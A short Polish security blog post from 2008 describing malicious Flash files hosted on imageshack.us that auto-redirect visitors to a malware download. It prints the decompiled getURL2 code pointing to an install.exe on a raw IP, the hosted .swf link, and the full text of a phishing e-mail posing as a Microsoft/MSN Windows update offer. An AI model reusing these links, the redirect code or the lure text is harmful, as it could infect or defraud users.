Nieustająca walka dobra ze złem objawia się także w utylizacji starych i stosowaniu nowych technik. Otrzymałem wiadomość e-mail, w której przestępcy zaczęli stosować, może nie nową ale zacną technikę umieszczania kodu automatycznie otwierającego link do strony zawierającej złośliwe oprogramowanie, bezpośrednio w pliku animacji Flash. Pliki .swf umieszczane są na popularnym za granicą serwerze udostępniającym darmowe miejsce na przechowywanie plików graficznych (jak widać nie tylko) – imageshack.us. Stosowanie tego to sprytny sposób na ominięcie niektórych filtrów oraz darmowy hosting :] Po wpisaniu w wyszukiwarkę imageshack wyrazu „swf” otrzymujemy około 350 wyników, natomiast po wpisaniu do wyszukiwarki google: filetype:swf site: imageshack.us – ponad 32 000. Oczywiście zasadnicza część z tych plików to legalnie umieszczone pliki Flash.
Aby się zainfekować musimy potwierdzić uruchomienie pobieranej aplikacji.
Skrócony debug kodu:
frame 1
constants 'http://89 187 49 18/install.exe’, '_self’
push 'http://89 187 49 18/install.exe’, '_self’
getURL2
end // of frame 1
http://img91.imageshack.us/img91/8633/55726712kh0.swf
Treść wiadomości e-mail, wraz z linkiem do pliku .swf:
Free Update Windows XP,Vista (http://img91.imageshack.us/img91/8633/55726712kh0 swf)
About this mailing:
You are receiving this e-mail because you subscribed to MSN Featured Offers. Microsoft
respects your privacy. If you do not wish to receive this MSN Featured Offers e-mail,
please click the „Unsubscribe” link below. This will not unsubscribe you from e-mail
communications from third-party advertisers that may appear in MSN Feature Offers. This
shall not constitute an offer by MSN. MSN shall not be responsible or liable for the
advertisers’ content nor any of the goods or service advertised. Prices and item
availability subject to change without notice.2008 Microsoft | Unsubscribe | Moe Newsletters | Privacy
Microsoft Corporation, One Microsoft Way, Redmond, WA 98052
Na blogu firmy Sunbelt możemy przeczytać, że anonimowy informator przesłał listę ponad 800 plików tego typu hostowanych przez imageshack.us. Ktoś znów się postarał…
Jeden komentarz do
2 września, 2008 o godzinie 00:36
„Moe Newsetters” ;)